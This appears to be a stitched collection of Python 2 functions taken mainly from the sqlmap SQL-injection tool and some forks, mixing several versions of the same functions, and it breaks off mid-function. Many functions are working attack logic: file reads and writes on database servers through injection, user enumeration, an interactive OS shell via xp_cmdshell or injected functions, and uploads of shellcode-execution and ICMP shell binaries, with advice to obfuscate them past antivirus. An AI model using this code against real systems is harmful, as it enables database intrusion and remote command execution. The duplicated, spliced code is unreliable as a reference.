def main(): """ Main function of apkscan when running from command line. """ try: paths.ROOT_PATH = module_path() set_paths() # Store original command line options for possible later restoration cmd_options.update(cmd_parser().__dict__) init_options(cmd_options) banner() data_stdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) init() start() except ApkscanUserQuitException: err_msg = "user quit" logger.error(err_msg) except ApkscanBaseException, ex: err_msg = get_unicode(ex.message) logger.critical(err_msg) sys.exit(1)
def sqlShell(self): infoMsg = "calling %s shell. To quit type " % kb.dbms infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) autoCompletion(sqlShell=True) while True: query = None try: query = raw_input("sql> ") except KeyboardInterrupt: print errMsg = "user aborted" logger.error(errMsg) except EOFError: print errMsg = "exit" logger.error(errMsg) break if not query: continue if query.lower() in ( "x", "q", "exit", "quit" ): break output = self.sqlQuery(query) if output and output != "Quit": dumper.string(query, output) elif output != "Quit": print "No output"
def update(): if not conf.updateAll: return rootDir = paths.SQLMAP_ROOT_PATH infoMsg = "updating sqlmap to the latest development version from the " infoMsg += "GitHub repository" logger.info(infoMsg) debugMsg = "sqlmap will try to update itself using 'git' command" logger.debug(debugMsg) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) process = execute("git pull %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE) pollProcess(process, True) stdout, stderr = process.communicate() if not process.returncode: logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", REVISION)) else: logger.error("update could not be completed (%s)" % repr(stderr)) if IS_WIN: infoMsg = "for Windows platform it's recommended " infoMsg += "to use a GitHub for Windows client for updating " infoMsg += "purposes (http://windows.github.com/)" else: infoMsg = "for Linux platform it's recommended " infoMsg += "to use a standard 'git' package (e.g.: 'sudo apt-get install git')" logger.info(infoMsg)
def runCase(switches=None, parse=None): retVal = True global failedItem initCase(switches) result = start() if result == False: # if None, ignore logger.error("the test did not run") retVal = False if parse and retVal: ifile = open(conf.dumper.getOutputFile(), "r") content = ifile.read() ifile.close() for item in parse: if item.startswith("r'") and item.endswith("'"): if not re.search(item[2:-1], content, re.DOTALL): retVal = False failedItem = item break elif content.find(item) < 0: retVal = False failedItem = item break cleanCase() return retVal
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): written = False self.checkDbmsOs() if localFile.endswith('_'): localFile = decloakToTemp(localFile) if conf.direct or isStackingAvailable(): if isStackingAvailable(): debugMsg = "going to upload the %s file with " % fileType debugMsg += "stacked query SQL injection technique" logger.debug(debugMsg) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) self.cleanup(onlyFileTbl=True) elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): debugMsg = "going to upload the %s file with " % fileType debugMsg += "UNION query SQL injection technique" logger.debug(debugMsg) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to write files to the underlying file " errMsg += "system of the back-end %s server" % Backend.getDbms() logger.error(errMsg) return None return written
def getUsers(self): infoMsg = "fetching database users" logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].users condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008"))) condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if condition: query = rootQuery.inband.query2 else: query = rootQuery.inband.query values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): kb.data.cachedUsers = [] for value in arrayizeValue(values): value = unArrayizeValue(value) if not isNoneValue(value): kb.data.cachedUsers.append(value) if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database users" logger.info(infoMsg) if condition: query = rootQuery.blind.count2 else: query = rootQuery.blind.count count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if count == 0: return kb.data.cachedUsers elif not isNumPosStrValue(count): errMsg = "unable to retrieve the number of database users" raise SqlmapNoneDataException(errMsg) plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") elif condition: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index user = unArrayizeValue(inject.getValue(query, union=False, error=False)) if user: kb.data.cachedUsers.append(user) if not kb.data.cachedUsers: errMsg = "unable to retrieve the database users" logger.error(errMsg) return kb.data.cachedUsers
def checkRegexp(): if not conf.regexp: return True condition = ( kb.resumedQueries.has_key(conf.url) and kb.resumedQueries[conf.url].has_key("Regular expression") and kb.resumedQueries[conf.url]["Regular expression"][:-1] == conf.regexp ) if condition: return True infoMsg = "testing if the provided regular expression matches within " infoMsg += "the target URL page content" logger.info(infoMsg) page = Request.queryPage(content=True) if re.search(conf.regexp, page, re.I | re.M): setRegexp() return True else: errMsg = "you provided '%s' as the regular expression to " % conf.regexp errMsg += "match, but such a regular expression does not have any " errMsg += "match within the target URL page content, please provide " errMsg += "another regular expression." logger.error(errMsg) return False
def apiSearch(): headers = { 'Authorization' : 'JWT ' + conf.zoomeye.key, } try: target = setSearchStr() logger.debug("search url:{0}".format(target)) count = int(conf.zoomeye.page) tmp = [] for i in range(count): conf.zoomeye.page = i r = requests.get(target,headers = headers) r_decoded = json.loads(r.text) tmp.append(r_decoded) #TEST #TODO for x in r_decoded['matches']: logger.info("find ip:" + x['ip']) conf.zoomeye.ip_list.append(x['ip']) saveSearchResult(tmp) except Exception,e: if str(e.message) == 'matches': logger.info("account was break, excceeding the max limitations") else: logger.info( str(e.message)) errMessage = str(e) logger.error(errMessage) raise ZoomeyeSearchException(errMessage)
def checkString(): if not conf.string: return True condition = ( kb.resumedQueries.has_key(conf.url) and kb.resumedQueries[conf.url].has_key("String") and kb.resumedQueries[conf.url]["String"][:-1] == conf.string ) if condition: return True infoMsg = "testing if the provided string is within the " infoMsg += "target URL page content" logger.info(infoMsg) page = Request.queryPage(content=True) if conf.string in page: setString() return True else: errMsg = "you provided '%s' as the string to " % conf.string errMsg += "match, but such a string is not within the target " errMsg += "URL page content, please provide another string." logger.error(errMsg) return False
def smokeTest(): """ This will run the basic smoke testing of a program """ retVal = True count, length = 0, 0 for _, _, files in os.walk(paths.SQLMAP_ROOT_PATH): for ifile in files: length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): for ifile in files: if os.path.splitext(ifile)[1].lower() == '.py' and ifile != '__init__.py': path = os.path.join(root, os.path.splitext(ifile)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: __import__(path) module = sys.modules[path] except Exception, msg: retVal = False dataToStdout("\r") errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(paths.SQLMAP_ROOT_PATH, ifile), msg) logger.error(errMsg) else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%s) ' % (count, length, round(100.0*count/length), '%') dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
def uploadShellcodeexec(self, web=False): self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec") if Backend.isOs(OS.WINDOWS): self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") else: self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote)) logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote) if web: written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal) else: written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) if written is not True: errMsg = "there has been a problem uploading shellcodeexec, it " errMsg += "looks like the binary file has not been written " errMsg += "on the database underlying file system or an AV has " errMsg += "flagged it as malicious and removed it. In such a case " errMsg += "it is recommended to recompile shellcodeexec with " errMsg += "slight modification to the source code or pack it " errMsg += "with an obfuscator software" logger.error(errMsg) return False else: logger.info("shellcodeexec successfully uploaded") return True
def login(): data = {} if conf.user: if not conf.passwd: conf.passwd = raw_input('[-] input : password :'******'username' : conf.user, 'password' : conf.passwd } data_encoded = json.dumps(data) try: r = requests.post(url = conf.zoomeye.login,data = data_encoded) r_decoded = json.loads(r.text) if r_decoded.has_key("access_token"): conf.zoomeye.key = r_decoded['access_token'] saveStrToFile(paths.APP_KEY_FILE,conf.zoomeye.key) return else: errMessage = r_decoded["message"] logger.error(errMessage) setLoginStr() login() except Exception,e: errMessage = "loggin error.\n" errMessage += str(e) errMessage += "\nPlease try it again" logger.error(errMessage) setLoginStr() login()
def uploadIcmpshSlave(self, web=False): ICMPsh._initVars(self) self._randStr = randomStr(lowercase=True) self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase) self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote)) logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote) if web: written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave) else: written = self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary", forceCheck=True) if written is not True: errMsg = "there has been a problem uploading icmpsh, it " errMsg += "looks like the binary file has not been written " errMsg += "on the database underlying file system or an AV has " errMsg += "flagged it as malicious and removed it. In such a case " errMsg += "it is recommended to recompile icmpsh with slight " errMsg += "modification to the source code or pack it with an " errMsg += "obfuscator software" logger.error(errMsg) return False else: logger.info("icmpsh successfully uploaded") return True
def apiSearch(): headers = { 'Authorization' : 'JWT ' + conf.zoomeye.key, } try: target = setSearchStr() logger.debug("search url:{0}".format(target)) count = int(conf.zoomeye.page) tmp = [] resultCount = 0 for i in range(count): conf.zoomeye.page = i r = requests.get(target,headers = headers) r_decoded = json.loads(r.text) resultCount += len(r_decoded["matches"]) tmp.append(r_decoded) saveSearchResult(tmp) logger.info("search results count:{0}".format(resultCount)) except Exception,e: if str(e.message) == 'matches': logger.info("account was break, excceeding the max limitations") else: logger.info( str(e.message)) errMessage = str(e) logger.error(errMessage) raise ZoomeyeSearchException(errMessage)
def _webFileStreamUpload(self, stream, destFileName, directory): stream.seek(0) # Rewind try: setattr(stream, "name", destFileName) except TypeError: pass if self.webApi in getPublicTypeMembers(WEB_API, True): multipartParams = { "upload": "1", "file": stream, "uploadDir": directory, } if self.webApi == WEB_API.ASPX: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) if "File uploaded" not in page: warnMsg = "unable to upload the file through the web file " warnMsg += "stager to '%s'" % directory logger.warn(warnMsg) return False else: return True else: logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi) return False
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER): """ REST-JSON API server """ DataStore.admin_id = hexencode(os.urandom(16)) Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1] #make adminid to known this is safe because api only avalible to local file_object = open('/www/xseclab.com/termite/.sqlmapadminid', 'w') file_object.write(DataStore.admin_id) file_object.close( ) logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) logger.info("Admin ID: %s" % DataStore.admin_id) logger.debug("IPC database: %s" % Database.filepath) # Initialize IPC database DataStore.current_db = Database() DataStore.current_db.connect() DataStore.current_db.init() # Run RESTful API try: if adapter == "gevent": from gevent import monkey monkey.patch_all() elif adapter == "eventlet": import eventlet eventlet.monkey_patch() logger.debug("Using adapter '%s' to run bottle" % adapter) run(host=host, port=port, quiet=True, debug=False, server=adapter) except socket.error, ex: if "already in use" in getSafeExString(ex): logger.error("Address already in use ('%s:%s')" % (host, port)) else: raise
def writeFile(self, localFile, remoteFile, fileType=None): self.checkDbmsOs() if localFile.endswith("_"): content = decloak(localFile) _ = os.path.split(localFile[:-1])[-1] prefix, suffix = os.path.splitext(_) handle, localFile = tempfile.mkstemp(prefix=prefix, suffix=suffix) os.close(handle) with open(localFile, "w+b") as f: f.write(content) if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): debugMsg = "going to upload the %s file with " % fileType debugMsg += "stacked query SQL injection technique" logger.debug(debugMsg) self.stackedWriteFile(localFile, remoteFile, fileType) self.cleanup(onlyFileTbl=True) elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): debugMsg = "going to upload the %s file with " % fileType debugMsg += "UNION query SQL injection technique" logger.debug(debugMsg) self.unionWriteFile(localFile, remoteFile, fileType) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to write files to the underlying file " errMsg += "system of the back-end %s server" % Backend.getDbms() logger.error(errMsg) return None
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, server_name="wsgiref"): """ REST-JSON API server """ DataStore.admin_id = hexencode(os.urandom(16)) Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1] logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) logger.info("Admin ID: %s" % DataStore.admin_id) logger.debug("IPC database: %s" % Database.filepath) # Initialize IPC database DataStore.current_db = Database() DataStore.current_db.connect() DataStore.current_db.init() # Run RESTful API try: if server_name == "gevent": from gevent import monkey monkey.patch_all() elif server_name == "eventlet": import eventlet eventlet.monkey_patch() logger.debug("use {0} adapter run bottle".format(server_name)) run(host=host, port=port, quiet=True, debug=False, server=server_name) except socket.error, ex: if "already in use" in getSafeExString(ex): logger.error("Address already in use ('%s:%s')" % (host, port)) else: raise
def put(self, src, dest): try: f = open(src, 'rb') self.handle.storbinary('STOR %s' %dest, f) except: err_msg = "ftp upload file '%s' failed! " %src logger.error(err_msg) finally: f.close()
def shell(self): if self.webBackdoorUrl and not isStackingAvailable(): infoMsg = "calling OS shell. To quit type " infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) else: if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): infoMsg = "going to use 'COPY ... FROM PROGRAM ...' " infoMsg += "command execution" logger.info(infoMsg) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): infoMsg = "going to use injected user-defined functions " infoMsg += "'sys_eval' and 'sys_exec' for operating system " infoMsg += "command execution" logger.info(infoMsg) elif Backend.isDbms(DBMS.MSSQL): infoMsg = "going to use extended procedure 'xp_cmdshell' for " infoMsg += "operating system command execution" logger.info(infoMsg) else: errMsg = "feature not yet implemented for the back-end DBMS" raise SqlmapUnsupportedFeatureException(errMsg) infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows") infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX) while True: command = None try: command = raw_input("os-shell> ") command = getUnicode(command, encoding=sys.stdin.encoding) except KeyboardInterrupt: print() errMsg = "user aborted" logger.error(errMsg) except EOFError: print() errMsg = "exit" logger.error(errMsg) break if not command: continue if command.lower() in ("x", "q", "exit", "quit"): break self.runCmd(command)
def readFile(self, rFile): fileContent = None self.checkDbmsOs() kb.fileReadMode = True if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): debugMsg = "going to read the file with stacked query SQL " debugMsg += "injection technique" logger.debug(debugMsg) fileContent = self.stackedReadFile(rFile) elif Backend.isDbms(DBMS.MYSQL): debugMsg = "going to read the file with a non-stacked query " debugMsg += "SQL injection technique" logger.debug(debugMsg) fileContent = self.nonStackedReadFile(rFile) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to read files from the underlying file " errMsg += "system of the back-end %s server" % Backend.getDbms() logger.error(errMsg) return None kb.fileReadMode = False if fileContent in ( None, "" ) and not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) return elif isListLike(fileContent): newFileContent = "" for chunk in fileContent: if isListLike(chunk): if len(chunk) > 0: chunk = chunk[0] else: chunk = "" if chunk: newFileContent += chunk fileContent = newFileContent fileContent = self.__unhexString(fileContent) rFilePath = dataToOutFile(fileContent) if not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) return rFilePath
def exceptionHandledFunction(threadFunction, silent=False): try: threadFunction() except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True raise except Exception, ex: if not silent: logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
def __unhexString(self, hexStr): if len(hexStr) % 2 != 0: errMsg = "for some reason(s) sqlmap retrieved an odd-length " errMsg += "hexadecimal string which it is not able to convert " errMsg += "to raw string" logger.error(errMsg) return hexStr return binascii.unhexlify(hexStr)
def exceptionHandledFunction(threadFunction): try: threadFunction() except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True raise except Exception, ex: # thread is just going to be silently killed logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
def downloadThread(): try: while conf.threadContinue: idxlock.acquire() if index[0] >= length: idxlock.release() return index[0] += 1 curidx = index[0] idxlock.release() if conf.threadContinue: charStart = time.time() val = getChar(curidx) if val is None: raise sqlmapValueException, "failed to get character at index %d (expected %d total)" % (curidx, length) else: break value[curidx-1] = val if conf.threadContinue: if showEta: etaProgressUpdate(time.time() - charStart, index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 for i in xrange(length): if value[i] is not None: endCharIndex = max(endCharIndex, i) output = '' if endCharIndex > conf.progressWidth: startCharIndex = endCharIndex - conf.progressWidth count = 0 for i in xrange(startCharIndex, endCharIndex): output += '_' if value[i] is None else value[i] for i in xrange(length): count += 1 if value[i] is not None else 0 if startCharIndex > 0: output = '..' + output[2:] if endCharIndex - startCharIndex == conf.progressWidth: output = output[:-2] + '..' output += '_' * (min(length, conf.progressWidth) - len(output)) status = ' %d/%d (%d%s)' % (count, length, round(100.0*count/length), '%') output += status if count != length else " "*len(status) iolock.acquire() dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output)) iolock.release() except (sqlmapConnectionException, sqlmapValueException), errMsg: conf.threadException = True logger.error("thread %d: %s" % (numThread + 1, errMsg))
def smokeTest(): """ Runs the basic smoke testing of a program """ retVal = True count, length = 0, 0 if not checkIntegrity(): retVal = False for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": path = os.path.join(root, os.path.splitext(filename)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: __import__(path) module = sys.modules[path] except Exception as ex: retVal = False dataToStdout("\r") errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) logger.error(errMsg) else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal
def __updateSqlmap(): rootDir = paths.SQLMAP_ROOT_PATH infoMsg = "updating sqlmap to latest development version from the " infoMsg += "subversion repository" logger.info(infoMsg) try: import pysvn debugMsg = "sqlmap will update itself using installed python-svn " debugMsg += "third-party library, http://pysvn.tigris.org/" logger.debug(debugMsg) def notify(event_dict): action = str(event_dict['action']) index = action.find('_') prefix = action[index + 1].upper() if index != -1 else action.capitalize() if action.find('_update') != -1: return if action.find('_completed') == -1: print "%s\t%s" % (prefix, event_dict['path']) else: revision = str(event_dict['revision']) index = revision.find('number ') if index != -1: revision = revision[index+7:].strip('>') logger.info('updated to the latest revision %s' % revision) client = pysvn.Client() client.callback_notify = notify client.update(rootDir) except ImportError, _: debugMsg = "sqlmap will try to update itself using 'svn' command" logger.debug(debugMsg) process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) pollProcess(process) svnStdout, svnStderr = process.communicate() if svnStderr: errMsg = svnStderr.strip() logger.error(errMsg) elif svnStdout: revision = re.search("revision\s+([\d]+)", svnStdout, re.I) if revision: logger.info('updated to the latest revision %s' % revision.group(1))
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None): """ REST-JSON API server """ DataStore.admin_token = hexencode(os.urandom(16)) DataStore.username = username DataStore.password = password _, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False) os.close(_) if port == 0: # random with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s: s.bind((host, 0)) port = s.getsockname()[1] logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) logger.info("Admin (secret) token: %s" % DataStore.admin_token) logger.debug("IPC database: '%s'" % Database.filepath) # Initialize IPC database DataStore.current_db = Database() DataStore.current_db.connect() DataStore.current_db.init() # Run RESTful API try: # Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet, fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste, rocket, tornado, twisted, waitress, wsgiref # Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names if adapter == "gevent": from gevent import monkey monkey.patch_all() elif adapter == "eventlet": import eventlet eventlet.monkey_patch() logger.debug("Using adapter '%s' to run bottle" % adapter) run(host=host, port=port, quiet=True, debug=True, server=adapter) except socket.error as ex: if "already in use" in getSafeExString(ex): logger.error("Address already in use ('%s:%s')" % (host, port)) else: raise except ImportError: if adapter.lower() not in server_names: errMsg = "Adapter '%s' is unknown. " % adapter errMsg += "List of supported adapters: %s" % ', '.join(sorted(list(server_names.keys()))) else: errMsg = "Server support for adapter '%s' is not installed on this system " % adapter errMsg += "(Note: you can try to install it with 'sudo apt-get install python-%s' or 'sudo pip install %s')" % (adapter, adapter) logger.critical(errMsg)
def get(self, dest): ret = None bufsize = 1024 file_save = os.path.join(paths.OUTPUT_PATH, dest) try: f = open(file_save,'wb').write self.handle.retrbinary('RETR %s' % os.path.basename(dest),f,bufsize) ret = file_save except: err_msg = "ftp download file '%s' failed! " %dest logger.error(err_msg) return ret
def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): """ REST-JSON API client """ addr = "http://%s:%d" % (host, port) logger.info("starting debug REST-JSON client to '%s'..." % addr) # TODO: write a simple client with requests, for now use curl from command line logger.error("not yet implemented, use curl from command line instead for now, for example:") print "\n\t$ curl http://%s:%d/task/new" % (host, port) print "\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/:taskid/start" % (host, port) print "\t$ curl http://%s:%d/scan/:taskid/output" % (host, port) print "\t$ curl http://%s:%d/scan/:taskid/log\n" % (host, port)
def start(): """ This function calls a function that performs checks on both URL stability and all GET, POST, Cookie and User-Agent parameters to check if they are dynamic and SQL injection affected """ if conf.direct: initTargetEnv() setupTargetEnv() action() return True if conf.url and not any((conf.forms, conf.crawlDepth)): kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None)) if conf.configFile and not kb.targets: errMsg = "you did not edit the configuration file properly, set " errMsg += "the target URL, list of targets or google dork" logger.error(errMsg) return False if kb.targets and len(kb.targets) > 1: infoMsg = "sqlmap got a total of %d targets" % len(kb.targets) logger.info(infoMsg) hostCount = 0 initialHeaders = list(conf.httpHeaders) for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets: try: conf.url = targetUrl conf.method = targetMethod.upper( ) if targetMethod else targetMethod conf.data = targetData conf.cookie = targetCookie conf.httpHeaders = list(initialHeaders) conf.httpHeaders.extend(targetHeaders or []) initTargetEnv() parseTargetUrl() testSqlInj = False if PLACE.GET in conf.parameters and not any( [conf.data, conf.testParameter]): for parameter in re.findall( r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]): paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0]) if paramKey not in kb.testedParams: testSqlInj = True break else: paramKey = (conf.hostname, conf.path, None, None) if paramKey not in kb.testedParams: testSqlInj = True if testSqlInj and conf.hostname in kb.vulnHosts: if kb.skipVulnHost is None: message = "SQL injection vulnerability has already been detected " message += "against '%s'. Do you want to skip " % conf.hostname message += "further tests involving it? [Y/n]" kb.skipVulnHost = readInput(message, default="Y").upper() != 'N' testSqlInj = not kb.skipVulnHost if not testSqlInj: infoMsg = "skipping '%s'" % targetUrl logger.info(infoMsg) continue if conf.multipleTargets: hostCount += 1 if conf.forms and conf.method: message = "[#%d] form:\n%s %s" % (hostCount, conf.method, targetUrl) else: message = "URL %d:\n%s %s" % (hostCount, HTTPMETHOD.GET, targetUrl) if conf.cookie: message += "\nCookie: %s" % conf.cookie if conf.data is not None: message += "\n%s data: %s" % ( (conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "") if conf.forms and conf.method: if conf.method == HTTPMETHOD.GET and targetUrl.find( "?") == -1: continue message += "\ndo you want to test this form? [Y/n/q] " test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): if conf.method != HTTPMETHOD.GET: message = "Edit %s data [default: %s]%s: " % ( conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult( EMPTY_FORM_FIELDS_REGEX, conf.data) else "") conf.data = readInput(message, default=conf.data) conf.data = _randomFillBlankFields(conf.data) conf.data = urldecode( conf.data) if conf.data and urlencode( DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data else: if targetUrl.find("?") > -1: firstPart = targetUrl[:targetUrl.find("?")] secondPart = targetUrl[targetUrl.find("?") + 1:] message = "Edit GET data [default: %s]: " % secondPart test = readInput(message, default=secondPart) test = _randomFillBlankFields(test) conf.url = "%s?%s" % (firstPart, test) parseTargetUrl() elif test[0] in ("n", "N"): continue elif test[0] in ("q", "Q"): break else: message += "\ndo you want to test this URL? [Y/n/q]" test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): pass elif test[0] in ("n", "N"): dataToStdout(os.linesep) continue elif test[0] in ("q", "Q"): break infoMsg = "testing URL '%s'" % targetUrl logger.info(infoMsg) setupTargetEnv() if not checkConnection(suppressOutput=conf.forms ) or not checkString() or not checkRegexp(): continue checkWaf() if conf.identifyWaf: identifyWaf() if conf.nullConnection: checkNullConnection() if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \ and (kb.injection.place is None or kb.injection.parameter is None): if not any( (conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: # NOTE: this is not needed anymore, leaving only to display # a warning message to the user in case the page is not stable checkStability() # Do a little prioritization reorder of a testable parameter list parameters = conf.parameters.keys() # Order of testing list (first to last) orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET) for place in orderList[::-1]: if place in parameters: parameters.remove(place) parameters.insert(0, place) proceed = True for place in parameters: # Test User-Agent and Referer headers only if # --level >= 3 skip = (place == PLACE.USER_AGENT and conf.level < 3) skip |= (place == PLACE.REFERER and conf.level < 3) # Test Host header only if # --level >= 5 skip |= (place == PLACE.HOST and conf.level < 5) # Test Cookie header only if --level >= 2 skip |= (place == PLACE.COOKIE and conf.level < 2) skip |= (place == PLACE.USER_AGENT and intersect( USER_AGENT_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.REFERER and intersect( REFERER_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.COOKIE and intersect( PLACE.COOKIE, conf.skip, True) not in ([], None)) skip |= (place == PLACE.HOST and intersect( PLACE.HOST, conf.skip, True) not in ([], None)) skip &= not (place == PLACE.USER_AGENT and intersect( USER_AGENT_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.REFERER and intersect( REFERER_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.HOST and intersect( HOST_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.COOKIE and intersect( (PLACE.COOKIE, ), conf.testParameter, True)) if skip: 